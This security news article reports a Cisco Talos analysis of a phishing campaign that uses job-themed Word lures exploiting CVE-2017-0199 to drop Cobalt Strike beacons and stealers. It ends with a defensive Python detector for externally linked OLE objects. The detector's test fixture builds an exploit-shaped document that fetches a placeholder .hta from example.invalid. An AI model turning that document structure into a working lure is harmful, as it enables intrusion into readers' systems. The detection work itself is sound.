A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.
“The payload discovered is a leaked version of a Cobalt Strike beacon,” Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday.
“The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon’s traffic.”
The malicious activity, discovered in August 2022, attempts to exploit CVE-2017-0199, a remote code execution bug in Microsoft Office's handling of linked OLE objects that Microsoft patched in April 2017 and that allows an attacker to take control of an affected system once a crafted document is opened.
The entry vector for the attack is a phishing email containing a Microsoft Word attachment that uses job-themed lures for roles in the U.S. government and the Public Service Association, a trade union based in New Zealand.
Cobalt Strike beacons are far from the only malware samples deployed: Cisco Talos said it has also observed the Redline Stealer and Amadey botnet executables delivered as payloads at the end of the attack chain.
Calling the attack methodology “highly modularized,” the cybersecurity company said the attack also stands out for its use of Bitbucket repositories to host malicious content that serves as the starting point for downloading a Windows executable responsible for deploying the Cobalt Strike DLL beacon.
In an alternative attack sequence, the Bitbucket repository functions as a conduit to deliver obfuscated VB and PowerShell downloader scripts that install a beacon hosted on a different Bitbucket account.
“This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim’s system memory,” the researchers said.
“Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker’s attempts in the earlier stage of the attack’s infection chain.”
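One place to act on that advice is the lure document itself, before any Bitbucket download or script ever runs. The Python check below is an added example, not Cisco Talos tooling or anything from the campaign: it flags the document shape that CVE-2017-0199 relies on in Word's OOXML format, an OLE object relationship whose target is an external URL rather than an embedded part, so that Office fetches remote content when the file is opened. The two sample documents are constructed in memory; the hostname example.invalid and the file name are placeholders, not indicators from this campaign. The RTF form of the same bug carries the link inside the RTF object stream instead and is not covered by this check.

```python
# Static triage for the CVE-2017-0199 document pattern in OOXML (.docx) packages:
# an OLE object relationship marked External whose target is a remote URL.
# Added example, not Cisco Talos code; sample documents are constructed below.
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def external_ole_links(docx_bytes):
    """Return [(rels_part, rel_id, target)] for every OLE relationship in the
    package whose TargetMode is External and whose target uses a remote scheme."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed relationship part: skip, it cannot resolve a link
            for rel in root.iter("{%s}Relationship" % PKG_REL_NS):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                # Internal is the default when TargetMode is absent (embedded object).
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if urlsplit(target).scheme.lower() in REMOTE_SCHEMES:
                    hits.append((name, rel.get("Id"), target))
    return hits


def verdict(docx_bytes):
    """'suspicious' if any OLE object is linked to a remote URL, else 'clean'."""
    return "suspicious" if external_ole_links(docx_bytes) else "clean"


# --- constructed sample documents (minimal OOXML packages, not real samples) ---
def build_sample_docx(ole_target, external):
    """Build a minimal .docx in memory containing one OLE object relationship."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        f'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OLE_REL_TYPE}" Target="{ole_target}"{mode}/>'
        f'</Relationships>'
    )
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<w:document xmlns:w="http://schemas.openxmlformats.org/'
                'wordprocessingml/2006/main"><w:body/></w:document>')
    types = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", types)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Benign: the OLE object is stored inside the package (no TargetMode).
BENIGN_DOCX = build_sample_docx("embeddings/oleObject1.bin", external=False)
# Exploit-shaped: linked OLE object fetched from a remote host at open time.
# example.invalid is a placeholder hostname, not an indicator from the campaign.
LINKED_DOCX = build_sample_docx("http://example.invalid/job-description.hta", external=True)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("linked", LINKED_DOCX)):
        print(label, verdict(doc), external_ole_links(doc))
```

Run it over attachments at the mail gateway or in a sandbox pre-filter: a clean result does not prove a document safe (macros, remote templates and the RTF variant need their own checks), but an external OLE link in a job-themed Word attachment is a strong signal worth quarantining before the downloader stage the researchers describe.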
Some parts of this article are sourced from:
thehackernews.com